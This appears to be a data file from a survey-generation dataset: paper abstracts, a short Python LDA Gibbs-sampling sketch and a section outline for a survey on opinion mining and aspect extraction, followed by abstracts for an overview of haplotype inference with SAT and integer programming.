Traditional facet-based sentiment analysis algorithms typically perform the various tasks in sequence, and fail to take advantage of the mutual reinforcement of the tasks. Additionally,inferring sentiment levels typically requires domain knowledge or human intervention. In this paper, we propose aseries of probabilistic models that jointly discover latent facets and sentiment topics, and also order the sentiment topics with respect to a multi-point scale, in a language and domain independent manner. This is achieved by simultaneously capturing both short-range syntactic structure and long range semantic dependencies between the sentiment and facet words. The models further incorporate coherence in reviews, where reviewers dwell on one facet or sentiment level before moving on, for more accurate facet and sentiment discovery. For reviews which are supplemented with ratings, our models automatically order the latent sentiment topics, without requiring seed-words or domain-knowledge. To the best of our knowledge, our work is the first attempt to combine the notions of syntactic and semantic dependencies ::: in the domain of review mining. Further, the concept of ::: facet and sentiment coherence has not been explored earlier either. Extensive experimental results on real world review data show that the proposed models outperform various state of the art baselines for facet-based sentiment analysis. --- paper_title: Latent Dirichlet Allocation paper_content: We describe latent Dirichlet allocation (LDA), a generative probabilistic model for collections of discrete data such as text corpora. LDA is a three-level hierarchical Bayesian model, in which each item of a collection is modeled as a finite mixture over an underlying set of topics. Each topic is, in turn, modeled as an infinite mixture over an underlying set of topic probabilities. In the context of text modeling, the topic probabilities provide an explicit representation of a document. We present efficient approximate inference techniques based on variational methods and an EM algorithm for empirical Bayes parameter estimation. We report results in document modeling, text classification, and collaborative filtering, comparing to a mixture of unigrams model and the probabilistic LSI model. --- paper_title: A Joint Model of Text and Aspect Ratings for Sentiment Summarization paper_content: Online reviews are often accompanied with numerical ratings provided by users for a set of service or product aspects. We propose a statistical model which is able to discover corresponding topics in text and extract textual evidence from reviews supporting each of these aspect ratings ‐ a fundamental problem in aspect-based sentiment summarization (Hu and Liu, 2004a). Our model achieves high accuracy, without any explicitly labeled data except the user provided opinion ratings. The proposed approach is general and can be used for segmentation in other applications where sequential data is accompanied with correlated signals. --- paper_title: An Aspect-Sentiment Pair Extraction Approach Based on Latent Dirichlet Allocation paper_content: Online user reviews have a great influence on decision-making process of customers and product sales of companies. However, it is very difficult to obtain user sentiments among huge volume of data on the web consequently; sentiment analysis has gained great importance in terms of analyzing data automatically. 
On the other hand, sentiment analysis divides itself into branches and can be performed better with aspect level analysis. In this paper, we proposed to extract aspect-sentiment pairs from a Turkish reviews dataset. The proposed task is the fundamental and indeed the critical step of the aspect level sentiment analysis. While extracting aspect-sentiment pairs, an unsupervised topic model Latent Dirichlet Allocation (LDA) is used. With LDA, aspect-sentiment pairs from user reviews are extracted with 0.86 average precision based on ranked list. The aspect-sentiment pair extraction problem is first time realized with LDA on a real-world Turkish user reviews dataset. The experimental results show that LDA is effective and robust in aspect-sentiment pair extraction from user reviews. --- paper_title: Coupled matrix factorization and topic modeling for aspect mining paper_content: Abstract Aspect mining, which aims to extract ad hoc aspects from online reviews and predict rating or opinion on each aspect, can satisfy the personalized needs for evaluation of specific aspect on product quality. Recently, with the increase of related research, how to effectively integrate rating and review information has become the key issue for addressing this problem. Considering that matrix factorization is an effective tool for rating prediction and topic modeling is widely used for review processing, it is a natural idea to combine matrix factorization and topic modeling for aspect mining (or called aspect rating prediction). However, this idea faces several challenges on how to address suitable sharing factors, scale mismatch, and dependency relation of rating and review information. In this paper, we propose a novel model to effectively integrate Matrix factorization and Topic modeling for Aspect rating prediction (MaToAsp). To overcome the above challenges and ensure the performance, MaToAsp employs items as the sharing factors to combine matrix factorization and topic modeling, and introduces an interpretive preference probability to eliminate scale mismatch. In the hybrid model, we establish a dependency relation from ratings to sentiment terms in phrases. The experiments on two real datasets including Chinese Dianping and English Tripadvisor prove that MaToAsp not only obtains reasonable aspect identification but also achieves the best aspect rating prediction performance, compared to recent representative baselines. --- paper_title: Joint sentiment/topic model for sentiment analysis paper_content: Sentiment analysis or opinion mining aims to use automated tools to detect subjective information such as opinions, attitudes, and feelings expressed in text. This paper proposes a novel probabilistic modeling framework based on Latent Dirichlet Allocation (LDA), called joint sentiment/topic model (JST), which detects sentiment and topic simultaneously from text. Unlike other machine learning approaches to sentiment classification which often require labeled corpora for classifier training, the proposed JST model is fully unsupervised. The model has been evaluated on the movie review dataset to classify the review sentiment polarity and minimum prior information have also been explored to further improve the sentiment classification accuracy. Preliminary experiments have shown promising results achieved by JST. --- paper_title: Aspect and sentiment unification model for online review analysis paper_content: User-generated reviews on the Web contain sentiments about detailed aspects of products and services. 
However, most of the reviews are plain text and thus require much effort to obtain information about relevant details. In this paper, we tackle the problem of automatically discovering what aspects are evaluated in reviews and how sentiments for different aspects are expressed. We first propose Sentence-LDA (SLDA), a probabilistic generative model that assumes all words in a single sentence are generated from one aspect. We then extend SLDA to Aspect and Sentiment Unification Model (ASUM), which incorporates aspect and sentiment together to model sentiments toward different aspects. ASUM discovers pairs of {aspect, sentiment} which we call senti-aspects. We applied SLDA and ASUM to reviews of electronic devices and restaurants. The results show that the aspects discovered by SLDA match evaluative details of the reviews, and the senti-aspects found by ASUM capture important aspects that are closely coupled with a sentiment. The results of sentiment classification show that ASUM outperforms other generative models and comes close to supervised classification methods. One important advantage of ASUM is that it does not require any sentiment labels of the reviews, which are often expensive to obtain. --- paper_title: Recursive Neural Conditional Random Fields for Aspect-based Sentiment Analysis paper_content: In aspect-based sentiment analysis, extracting aspect terms along with the opinions being expressed from user-generated content is one of the most important subtasks. Previous studies have shown that exploiting connections between aspect and opinion terms is promising for this task. In this paper, we propose a novel joint model that integrates recursive neural networks and conditional random fields into a unified framework for explicit aspect and opinion terms co-extraction. The proposed model learns high-level discriminative features and double propagate information between aspect and opinion terms, simultaneously. Moreover, it is flexible to incorporate hand-crafted features into the proposed model to further boost its information extraction performance. Experimental results on the SemEval Challenge 2014 dataset show the superiority of our proposed model over several baseline methods as well as the winning systems of the challenge. --- paper_title: Exploiting coherence for the simultaneous discovery of latent facets and associated sentiments paper_content: Facet-based sentiment analysis involves discovering the ::: latent facets, sentiments and their associations. Traditional facet-based sentiment analysis algorithms typically perform the various tasks in sequence, and fail to take advantage of the mutual reinforcement of the tasks. Additionally,inferring sentiment levels typically requires domain knowledge or human intervention. In this paper, we propose aseries of probabilistic models that jointly discover latent facets and sentiment topics, and also order the sentiment topics with respect to a multi-point scale, in a language and domain independent manner. This is achieved by simultaneously capturing both short-range syntactic structure and long range semantic dependencies between the sentiment and facet words. The models further incorporate coherence in reviews, where reviewers dwell on one facet or sentiment level before moving on, for more accurate facet and sentiment discovery. For reviews which are supplemented with ratings, our models automatically order the latent sentiment topics, without requiring seed-words or domain-knowledge. 
To the best of our knowledge, our work is the first attempt to combine the notions of syntactic and semantic dependencies ::: in the domain of review mining. Further, the concept of ::: facet and sentiment coherence has not been explored earlier either. Extensive experimental results on real world review data show that the proposed models outperform various state of the art baselines for facet-based sentiment analysis. --- paper_title: OpinionMiner: a novel machine learning system for web opinion mining and extraction paper_content: Merchants selling products on the Web often ask their customers to share their opinions and hands-on experiences on products they have purchased. Unfortunately, reading through all customer reviews is difficult, especially for popular items, the number of reviews can be up to hundreds or even thousands. This makes it difficult for a potential customer to read them to make an informed decision. The OpinionMiner system designed in this work aims to mine customer reviews of a product and extract high detailed product entities on which reviewers express their opinions. Opinion expressions are identified and opinion orientations for each recognized product entity are classified as positive or negative. Different from previous approaches that employed rule-based or statistical techniques, we propose a novel machine learning approach built under the framework of lexicalized HMMs. The approach naturally integrates multiple important linguistic features into automatic learning. In this paper, we describe the architecture and main components of the system. The evaluation of the proposed method is presented based on processing the online product reviews from Amazon and other publicly available datasets. --- paper_title: Lifelong Learning CRF for Supervised Aspect Extraction paper_content: This paper makes a focused contribution to supervised aspect extraction. It shows that if the system has performed aspect extraction from many past domains and retained their results as knowledge, Conditional Random Fields (CRF) can leverage this knowledge in a lifelong learning manner to extract in a new domain markedly better than the traditional CRF without using this prior knowledge. The key innovation is that even after CRF training, the model can still improve its extraction with experiences in its applications. --- paper_title: Structure-Aware Review Mining and Summarization paper_content: In this paper, we focus on object feature based review summarization. Different from most of previous work with linguistic rules or statistical methods, we formulate the review mining task as a joint structure tagging problem. We propose a new machine learning framework based on Conditional Random Fields (CRFs). It can employ rich features to jointly extract positive opinions, negative opinions and object features for review sentences. The linguistic structure can be naturally integrated into model representation. Besides linear-chain structure, we also investigate conjunction structure and syntactic tree structure in this framework. Through extensive experiments on movie review and product review data sets, we show that structure-aware models outperform many state-of-the-art approaches to review mining. --- paper_title: Extracting Opinion Targets in a Single and Cross-Domain Setting with Conditional Random Fields paper_content: In this paper, we focus on the opinion target extraction as part of the opinion mining task. 
We model the problem as an information extraction task, which we address based on Conditional Random Fields (CRF). As a baseline we employ the supervised algorithm by Zhuang et al. (2006), which represents the state-of-the-art on the employed data. We evaluate the algorithms comprehensively on datasets from four different domains annotated with individual opinion target instances on a sentence level. Furthermore, we investigate the performance of our CRF-based approach and the baseline in a single- and cross-domain opinion target extraction setting. Our CRF-based approach improves the performance by 0.077, 0.126, 0.071 and 0.178 regarding F-Measure in the single-domain extraction in the four domains. In the cross-domain setting our approach improves the performance by 0.409, 0.242, 0.294 and 0.343 regarding F-Measure over the baseline. --- paper_title: Aspect Term Extraction Based on MFE-CRF paper_content: This paper is focused on aspect term extraction in aspect-based sentiment analysis (ABSA), which is one of the hot spots in natural language processing (NLP). This paper proposes MFE-CRF that introduces Multi-Feature Embedding (MFE) clustering based on the Conditional Random Field (CRF) model to improve the effect of aspect term extraction in ABSA. First, Multi-Feature Embedding (MFE) is proposed to improve the text representation and capture more semantic information from text. Then the authors use kmeans++ algorithm to obtain MFE and word clustering to enrich the position features of CRF. Finally, the clustering classes of MFE and word embedding are set as the additional position features to train the model of CRF for aspect term extraction. The experiments on SemEval datasets validate the effectiveness of this model. The results of different models indicate that MFE-CRF can greatly improve the Recall rate of CRF model. Additionally, the Precision rate also is increased obviously when the semantics of text is complex. --- paper_title: Fine-grained Opinion Mining with Recurrent Neural Networks and Word Embeddings paper_content: The tasks in fine-grained opinion mining can be regarded as either a token-level sequence labeling problem or as a semantic compositional task. We propose a general class of discriminative models based on recurrent neural networks (RNNs) and word embeddings that can be successfully applied to such tasks without any taskspecific feature engineering effort. Our experimental results on the task of opinion target identification show that RNNs, without using any hand-crafted features, outperform feature-rich CRF-based models. Our framework is flexible, allows us to incorporate other linguistic features, and achieves results that rival the top performing systems in SemEval-2014. --- paper_title: Multi-task Coupled Attentions for Category-specific Aspect and Opinion Terms Co-extraction paper_content: In aspect-based sentiment analysis, most existing methods either focus on aspect/opinion terms extraction or aspect terms categorization. However, each task by itself only provides partial information to end users. To generate more detailed and structured opinion analysis, we propose a finer-grained problem, which we call category-specific aspect and opinion terms extraction. This problem involves the identification of aspect and opinion terms within each sentence, as well as the categorization of the identified terms. To this end, we propose an end-to-end multi-task attention model, where each task corresponds to aspect/opinion terms extraction for a specific category. 
Our model benefits from exploring the commonalities and relationships among different tasks to address the data sparsity issue. We demonstrate its state-of-the-art performance on three benchmark datasets. --- paper_title: Aspect Term Extraction with History Attention and Selective Transformation paper_content: Aspect Term Extraction (ATE), a key sub-task in Aspect-Based Sentiment Analysis, aims to extract explicit aspect expressions from online user reviews. We present a new framework for tackling ATE. It can exploit two useful clues, namely opinion summary and aspect detection history. Opinion summary is distilled from the whole input sentence, conditioned on each current token for aspect prediction, and thus the tailor-made summary can help aspect prediction on this token. Another clue is the information of aspect detection history, and it is distilled from the previous aspect predictions so as to leverage the coordinate structure and tagging schema constraints to upgrade the aspect prediction. Experimental results over four benchmark datasets clearly demonstrate that our framework can outperform all state-of-the-art methods. --- paper_title: Global Inference for Aspect and Opinion Terms Co-Extraction Based on Multi-Task Neural Networks paper_content: Extracting aspect terms and opinion terms are two fundamental tasks in opinion mining. The recent success of deep learning has inspired various neural network architectures, which have been shown to achieve highly competitive performance in these two tasks. However, most existing methods fail to explicitly consider the syntactic relations among aspect terms and opinion terms, which may lead to the inconsistencies between the model predictions and the syntactic constraints. To this end, we first apply a multi-task learning framework to implicitly capture the relations between the two tasks, and then propose a global inference method by explicitly modelling several syntactic constraints among aspect term extraction and opinion term extraction to uncover their intra-task and inter-task relationship, which seeks an optimal solution over the neural predictions for both tasks. Extensive evaluations on three benchmark datasets demonstrate that our global inference approach is able to bring consistent improvements over several base models in different scenarios. --- paper_title: Dependency-Tree Based Convolutional Neural Networks for Aspect Term Extraction paper_content: Aspect term extraction is one of the fundamental subtasks in aspect-based sentiment analysis. Previous work has shown that sentences’ dependency information is critical and has been widely used for opinion mining. With recent success of deep learning in natural language processing (NLP), recurrent neural network (RNN) has been proposed for aspect term extraction and shows the superiority over feature-rich CRFs based models. However, because RNN is a sequential model, it can not effectively capture tree-based dependency information of sentences thus limiting its practicability. In order to effectively exploit sentences’ dependency information and leverage the effectiveness of deep learning, we propose a novel dependency-tree based convolutional stacked neural network (DTBCSNN) for aspect term extraction, in which tree-based convolution is introduced over sentences’ dependency parse trees to capture syntactic features. Our model is an end-to-end deep learning based model and it does not need any human-crafted features. 
Furthermore, our model is flexible to incorporate extra linguistic features to further boost the model performance. To substantiate, results from experiments on SemEval2014 Task4 datasets (reviews on restaurant and laptop domain) show that our model achieves outstanding performance and outperforms the RNN and CRF baselines. --- paper_title: Distributed Representations of Words and Phrases and their Compositionality paper_content: The recently introduced continuous Skip-gram model is an efficient method for learning high-quality distributed vector representations that capture a large number of precise syntactic and semantic word relationships. In this paper we present several extensions that improve both the quality of the vectors and the training speed. By subsampling of the frequent words we obtain significant speedup and also learn more regular word representations. We also describe a simple alternative to the hierarchical softmax called negative sampling. ::: ::: An inherent limitation of word representations is their indifference to word order and their inability to represent idiomatic phrases. For example, the meanings of "Canada" and "Air" cannot be easily combined to obtain "Air Canada". Motivated by this example, we present a simple method for finding phrases in text, and show that learning good vector representations for millions of phrases is possible. --- paper_title: Double Embeddings and CNN-based Sequence Labeling for Aspect Extraction paper_content: One key task of fine-grained sentiment analysis of product reviews is to extract product aspects or features that users have expressed opinions on. This paper focuses on supervised aspect extraction using deep learning. Unlike other highly sophisticated supervised deep learning models, this paper proposes a novel and yet simple CNN model employing two types of pre-trained embeddings for aspect extraction: general-purpose embeddings and domain-specific embeddings. Without using any additional supervision, this model achieves surprisingly good results, outperforming state-of-the-art sophisticated existing methods. To our knowledge, this paper is the first to report such double embeddings based CNN model for aspect extraction and achieve very good results. --- paper_title: Emotions Evoked by Common Words and Phrases: Using Mechanical Turk to Create an Emotion Lexicon paper_content: Even though considerable attention has been given to semantic orientation of words and the creation of large polarity lexicons, research in emotion analysis has had to rely on limited and small emotion lexicons. In this paper, we show how we create a high-quality, moderate-sized emotion lexicon using Mechanical Turk. In addition to questions about emotions evoked by terms, we show how the inclusion of a word choice question can discourage malicious data entry, help identify instances where the annotator may not be familiar with the target term (allowing us to reject such annotations), and help obtain annotations at sense level (rather than at word level). We perform an extensive analysis of the annotations to better understand the distribution of emotions evoked by terms of different parts of speech. We identify which emotions tend to be evoked simultaneously by the same term and show that certain emotions indeed go hand in hand. --- paper_title: Mining and summarizing customer reviews paper_content: Merchants selling products on the Web often ask their customers to review the products that they have purchased and the associated services. 
As e-commerce is becoming more and more popular, the number of customer reviews that a product receives grows rapidly. For a popular product, the number of reviews can be in hundreds or even thousands. This makes it difficult for a potential customer to read them to make an informed decision on whether to purchase the product. It also makes it difficult for the manufacturer of the product to keep track and to manage customer opinions. For the manufacturer, there are additional difficulties because many merchant sites may sell the same product and the manufacturer normally produces many kinds of products. In this research, we aim to mine and to summarize all the customer reviews of a product. This summarization task is different from traditional text summarization because we only mine the features of the product on which the customers have expressed their opinions and whether the opinions are positive or negative. We do not summarize the reviews by selecting a subset or rewrite some of the original sentences from the reviews to capture the main points as in the classic text summarization. Our task is performed in three steps: (1) mining product features that have been commented on by customers; (2) identifying opinion sentences in each review and deciding whether each opinion sentence is positive or negative; (3) summarizing the results. This paper proposes several novel techniques to perform these tasks. Our experimental results using reviews of a number of products sold online demonstrate the effectiveness of the techniques. --- paper_title: SentiWordNet 3.0: An Enhanced Lexical Resource for Sentiment Analysis and Opinion Mining paper_content: In this work we present SENTIWORDNET 3.0, a lexical resource explicitly devised for supporting sentiment classification and opinion mining applications. SENTIWORDNET 3.0 is an improved version of SENTIWORDNET 1.0, a lexical resource publicly available for research purposes, now currently licensed to more than 300 research groups and used in a variety of research projects worldwide. Both SENTIWORDNET 1.0 and 3.0 are the result of automatically annotating all WORDNET synsets according to their degrees of positivity, negativity, and neutrality. SENTIWORDNET 1.0 and 3.0 differ (a) in the versions of WORDNET which they annotate (WORDNET 2.0 and 3.0, respectively), (b) in the algorithm used for automatically annotating WORDNET, which now includes (additionally to the previous semi-supervised learning step) a random-walk step for refining the scores. We here discuss SENTIWORDNET 3.0, especially focussing on the improvements concerning aspect (b) that it embodies with respect to version 1.0. We also report the results of evaluating SENTIWORDNET 3.0 against a fragment of WORDNET 3.0 manually annotated for positivity, negativity, and neutrality; these results indicate accuracy improvements of about 20% with respect to SENTIWORDNET 1.0. --- paper_title: Hierarchical viewpoint discovery from tweets using Bayesian modelling paper_content: Abstract When users express their stances towards a topic in social media, they might elaborate their viewpoints or reasoning. Oftentimes, viewpoints expressed by different users exhibit a hierarchical structure. Therefore, detecting this kind of hierarchical viewpoints offers a better insight to understand the public opinion. In this paper, we propose a novel Bayesian model for hierarchical viewpoint discovery from tweets. 
Driven by the motivation that a viewpoint expressed in a tweet can be regarded as a path from the root to a leaf of a hierarchical viewpoint tree, the assignment of the relevant viewpoint topics is assumed to follow two nested Chinese restaurant processes. Moreover, opinions in text are often expressed in un-semantically decomposable multi-terms or phrases, such as ‘economic recession’. Hence, a hierarchical Pitman–Yor process is employed as a prior for modelling the generation of phrases with arbitrary length. Experimental results on two Twitter corpora demonstrate the effectiveness of the proposed Bayesian model for hierarchical viewpoint discovery. --- paper_title: Hierarchical latent tree analysis for topic detection paper_content: In the LDA approach to topic detection, a topic is determined by identifying the words that are used with high frequency when writing about the topic. However, high frequency words in one topic may be also used with high frequency in other topics. Thus they may not be the best words to characterize the topic. In this paper, we propose a new method for topic detection, where a topic is determined by identifying words that appear with high frequency in the topic and low frequency in other topics. We model patterns of word co- occurrence and co-occurrences of those patterns using a hierarchy of discrete latent variables. The states of the latent variables represent clusters of documents and they are interpreted as topics. The words that best distinguish a cluster from other clusters are selected to characterize the topic. Empirical results show that the new method yields topics with clearer thematic characterizations than the alternative approaches. --- paper_title: Latent Tree Analysis paper_content: Latent tree analysis seeks to model the correlations among a set of random variables using a tree of latent variables. It was proposed as an improvement to latent class analysis --- a method widely used in social sciences and medicine to identify homogeneous subgroups in a population. It provides new and fruitful perspectives on a number of machine learning areas, including cluster analysis, topic detection, and deep probabilistic modeling. This paper gives an overview of the research on latent tree analysis and various ways it is used in practice. --- paper_title: Hierarchical Topic Models and the Nested Chinese Restaurant Process paper_content: We address the problem of learning topic hierarchies from data. The model selection problem in this domain is daunting—which of the large collection of possible trees to use? We take a Bayesian approach, generating an appropriate prior via a distribution on partitions that we refer to as the nested Chinese restaurant process. This nonparametric prior allows arbitrarily large branching factors and readily accommodates growing data collections. We build a hierarchical topic model by combining this prior with a likelihood that is based on a hierarchical variant of latent Dirichlet allocation. We illustrate our approach on simulated data and with an application to the modeling of NIPS abstracts. --- paper_title: Incorporating self-organizing map with text mining techniques for text hierarchy generation paper_content: Graphical abstractThis work proposes a scheme to improve the self-organizing map algorithm. This is the overall flowchart of the proposed algorithm. 
The key ingredients include: (1) a novel topic identification scheme; (2) lateral expansion using a novel topic incompatibility measure; and (3) a hierarchical expansion scheme using novel cluster size and topic size criteria. Highlights: incorporation of topic identification into SOM learning could be beneficial to the text categorization task; both lateral and hierarchical expansion during SOM learning were achieved according to criteria based on identified topics; the produced text hierarchies outperformed contemporary approaches in quality and performance on text categorization. Self-organizing maps (SOM) have been applied on numerous data clustering and visualization tasks and received much attention on their success. One major shortage of the classical SOM learning algorithm is the necessity of a predefined map topology. Furthermore, hierarchical relationships among data are also difficult to be found. Several approaches have been devised to conquer these deficiencies. In this work, we propose a novel SOM learning algorithm which incorporates several text mining techniques in expanding the map both laterally and hierarchically. On training a set of text documents, the proposed algorithm will first cluster them using the classical SOM algorithm. We then identify the topics of each cluster. These topics are then used to evaluate the criteria on expanding the map. The major characteristic of the proposed approach is to combine the learning process with the text mining process, which makes it suitable for automatic organization of text documents. We applied the algorithm on the Reuters-21578 dataset in text clustering and categorization tasks. Our method outperforms two comparing models in hierarchy quality according to users' evaluation. It also receives better F1-scores than two other models in the text categorization task. --- paper_title: BERT: Pre-training of Deep Bidirectional Transformers for Language Understanding paper_content: We introduce a new language representation model called BERT, which stands for Bidirectional Encoder Representations from Transformers. Unlike recent language representation models, BERT is designed to pre-train deep bidirectional representations from unlabeled text by jointly conditioning on both left and right context in all layers. As a result, the pre-trained BERT model can be fine-tuned with just one additional output layer to create state-of-the-art models for a wide range of tasks, such as question answering and language inference, without substantial task-specific architecture modifications. BERT is conceptually simple and empirically powerful.
It obtains new state-of-the-art results on eleven natural language processing tasks, including pushing the GLUE score to 80.5% (7.7% point absolute improvement), MultiNLI accuracy to 86.7% (4.6% absolute improvement), SQuAD v1.1 question answering Test F1 to 93.2 (1.5 point absolute improvement) and SQuAD v2.0 Test F1 to 83.1 (5.1 point absolute improvement). --- paper_title: Deep contextualized word representations paper_content: We introduce a new type of deep contextualized word representation that models both (1) complex characteristics of word use (e.g., syntax and semantics), and (2) how these uses vary across linguistic contexts (i.e., to model polysemy). Our word vectors are learned functions of the internal states of a deep bidirectional language model (biLM), which is pre-trained on a large text corpus. We show that these representations can be easily added to existing models and significantly improve the state of the art across six challenging NLP problems, including question answering, textual entailment and sentiment analysis. We also present an analysis showing that exposing the deep internals of the pre-trained network is crucial, allowing downstream models to mix different types of semi-supervision signals. ---
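Several of the models cited above (JST, ASUM, MaxEnt-LDA, LARA) are built on top of the basic LDA topic model. As a rough, illustrative sketch of the machinery they extend (not code from any of the cited papers), the following Python snippet runs a collapsed Gibbs sampler for plain LDA on a toy review corpus; the corpus, the number of topics and the Dirichlet hyperparameters are made-up values chosen only for demonstration.

```python
import numpy as np

# Toy corpus and made-up hyperparameters, purely for illustration.
docs = [["screen", "battery", "battery", "great"],
        ["food", "service", "awful", "service"],
        ["battery", "poor", "screen"]]
vocab = sorted({w for d in docs for w in d})
w2id = {w: i for i, w in enumerate(vocab)}
K, V, alpha, beta = 2, len(vocab), 0.5, 0.1          # topics and Dirichlet priors

rng = np.random.default_rng(0)
z = [[rng.integers(K) for _ in d] for d in docs]     # random initial topic per token
ndk = np.zeros((len(docs), K))                       # document-topic counts
nkw = np.zeros((K, V))                               # topic-word counts
nk = np.zeros(K)                                     # tokens per topic
for d, doc in enumerate(docs):
    for i, w in enumerate(doc):
        k = z[d][i]
        ndk[d, k] += 1; nkw[k, w2id[w]] += 1; nk[k] += 1

for _ in range(200):                                 # collapsed Gibbs sweeps
    for d, doc in enumerate(docs):
        for i, w in enumerate(doc):
            k, wid = z[d][i], w2id[w]
            ndk[d, k] -= 1; nkw[k, wid] -= 1; nk[k] -= 1   # remove current assignment
            # p(z = k | rest) is proportional to (n_dk + alpha) * (n_kw + beta) / (n_k + V*beta)
            p = (ndk[d] + alpha) * (nkw[:, wid] + beta) / (nk + V * beta)
            k = rng.choice(K, p=p / p.sum())
            z[d][i] = k
            ndk[d, k] += 1; nkw[k, wid] += 1; nk[k] += 1

phi = (nkw + beta) / (nkw.sum(axis=1, keepdims=True) + V * beta)
for k in range(K):
    print("topic", k, [vocab[i] for i in np.argsort(-phi[k])[:3]])
```

The per-token update implements the standard LDA full conditional; the aspect-sentiment models listed above add further latent variables (for example a sentiment label per sentence or per word) but reuse the same count-based sampling pattern.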
Title: A Survey on Opinion Mining: From Stance to Product Aspect
Section 1: INTRODUCTION
Description 1: Briefly introduce the growth of user-generated text containing opinions, the quintuple used in opinion mining, and the importance of automating opinion discovery from online texts.
Section 2: EVALUATION METRICS AND AVAILABLE DATASETS
Description 2: Describe different evaluation metrics used for opinion mining system performance and summarize widely used datasets and lexicons for stance detection and product aspect mining.
Section 3: STANCE DETECTION
Description 3: Provide a comprehensive summary of stance detection methodologies, including problem settings and various approaches such as supervised learning, weakly supervised learning, and collective models for stance detection in online debate forums and social media.
Section 4: PRODUCT ASPECT MINING
Description 4: Present an in-depth survey on product aspect mining methodologies, including corpus-level aspect extraction, corpus-level aspect and opinion mining, and document/sentence level aspect and opinion mining.
Section 5: CHALLENGES AND POSSIBLE SOLUTIONS
Description 5: Discuss significant challenges in opinion mining, such as the lack of stance lexicons and large-scale annotated corpus for stance detection, and the need for structured aspect mining and incorporating external knowledge.
Section 6: CONCLUSION
Description 6: Summarize the survey findings, observed trends, and future directions, emphasizing the transition from traditional methods to knowledge-based approaches and neural-based models.
Haplotype Inference with Boolean Constraint Solving: An Overview
12
--- paper_title: Efficient haplotype inference with pseudo-Boolean optimization paper_content: Haplotype inference from genotype data is a key computational problem in bioinformatics, since retrieving directly haplotype information from DNA samples is not feasible using existing technology. One of the methods for solving this problem uses the pure parsimony criterion, an approach known as Haplotype Inference by Pure Parsimony (HIPP). Initial work in this area was based on a number of different Integer Linear Programming (ILP) models and branch and bound algorithms. Recent work has shown that the utilization of a Boolean Satisfiability (SAT) formulation and state of the art SAT solvers represents the most efficient approach for solving the HIPP problem. ::: ::: Motivated by the promising results obtained using SAT techniques, this paper investigates the utilization of modern Pseudo-Boolean Optimization (PBO) algorithms for solving the HIPP problem. The paper starts by applying PBO to existing ILP models. The results are promising, and motivate the development of a new PBO model (RPoly) for the HIPP problem, which has a compact representation and eliminates key symmetries. Experimental results indicate that RPoly outperforms the SAT-based approach on most problem instances, being, in general, significantly more efficient. --- paper_title: A New Integer Programming Formulation for the Pure Parsimony Problem in Haplotype Analysis paper_content: We present a new integer programming formulation for the haplotype inference by pure parsimony (HIPP) problem. Unlike a previous approach to this problem [2], we create an integer program whose size is polynomial in the size of the input. This IP is substantially smaller for moderate-sized instances of the HIPP problem. We also show several additional constraints, based on the input, that can be added to the IP to aid in finding a solution, and show how to find which of these constraints is active for a given instance in efficient time. We present experimental results that show our IP has comparable success to the formulation of Gusfield [2] on moderate-sized problems, though it is is much slower. However, our formulation can sometimes solve substantially larger problems than are practical with Gusfield’s formulation. --- paper_title: Efficient haplotype inference with boolean satisfiability paper_content: Mutation in DNA is the principal cause for differences among human beings, and Single Nucleotide Polymorphisms (SNPs) are the most common mutations. Hence, a fundamental task is to complete a map of haplotypes (which identify SNPs) in the human population. Associated with this effort, a key computational problem is the inference of haplotype data from genotype data, since in practice genotype data rather than haplotype data is usually obtained. Different haplotype inference approaches have been proposed, including the utilization of statistical methods and the utilization of the pure parsimony criterion. The problem of haplotype inference by pure parsimony (HIPP) is interesting not only because of its application to haplotype inference, but also because it is a challenging NP-hard problem, being APX-hard. Recent work has shown that a SAT-based approach is the most efficient approach for the problem of haplotype inference by pure parsimony (HIPP), being several orders of magnitude faster than existing integer linear programming and branch and bound solutions. 
This paper provides a detailed description of SHIPs, a SAT-based approach for the HIPP problem, and presents comprehensive experimental results comparing SHIPs with all other exact approaches for the HIPP problem. These results confirm that SHIPs is currently the most effective approach for the HIPP problem. --- paper_title: Integer programming approaches to haplotype inference by pure parsimony paper_content: In 2003, Gusfield introduced the Haplotype Inference by Pure Parsimony (HIPP) problem and presented an integer program (IP) that quickly solved many simulated instances of the problem [1]. Although it solved well on small instances, Gusfield's IP can be of exponential size in the worst case. Several authors [2], [3] have presented polynomial-sized IPs for the problem. In this paper, we further the work on IP approaches to HIPP. We extend the existing polynomial-sized IPs by introducing several classes of valid cuts for the IP. We also present a new polynomial-sized IP formulation that is a hybrid between two existing IP formulations and inherits many of the strengths of both. Many problems that are too complex for the exponential-sized formulations can still be solved in our new formulation in a reasonable amount of time. We provide a detailed empirical comparison of these IP formulations on both simulated and real genotype sequences. Our formulation can also be extended in a variety of ways to allow errors in the input or model the structure of the population under consideration. --- paper_title: Haplotype inference by pure Parsimony paper_content: The next high-priority phase of human genomics will involve the development and use of a full Haplotype Map of the human genome [7]. A critical, perhaps dominating, problem in all such efforts is the inference of large-scale SNP-haplotypes from raw genotype SNP data. This is called the Haplotype Inference (HI) problem. Abstractly, input to the HI problem is a set of n strings over a ternary alphabet. A solution is a set of at most 2n strings over the binary alphabet, so that each input string can be "generated" by some pair of the binary strings in the solution. For greatest biological fidelity, a solution should be consistent with, or evaluated by, properties derived from an appropriate genetic model. ::: ::: A natural model, that has been suggested repeatedly is called here the Pure Parsimony model, where the goal is to find a smallest set of binary strings that can generate the n input strings. The problem of finding such a smallest set is called the Pure Parsimony Problem. Unfortunately, the Pure Parsimony problem is NP-hard, and no paper has previously shown how an optimal Pure-parsimony solution can be computed efficiently for problem instances of the size of current biological interest. In this paper, we show how to formulate the Pure-parsimony problem as an integer linear program; we explain how to improve the practicality of the integer programming formulation; and we present the results of extensive experimentation we have done to show the time and memory practicality of the method, and to compare its accuracy against solutions found by the widely used general haplotyping program PHASE. We also formulate and experiment with variations of the Pure-Parsimony criteria, that allow greater practicality. The results are that the Pure Parsimony problem can be solved efficiently in practice for a wide range of problem instances of current interest in biology. 
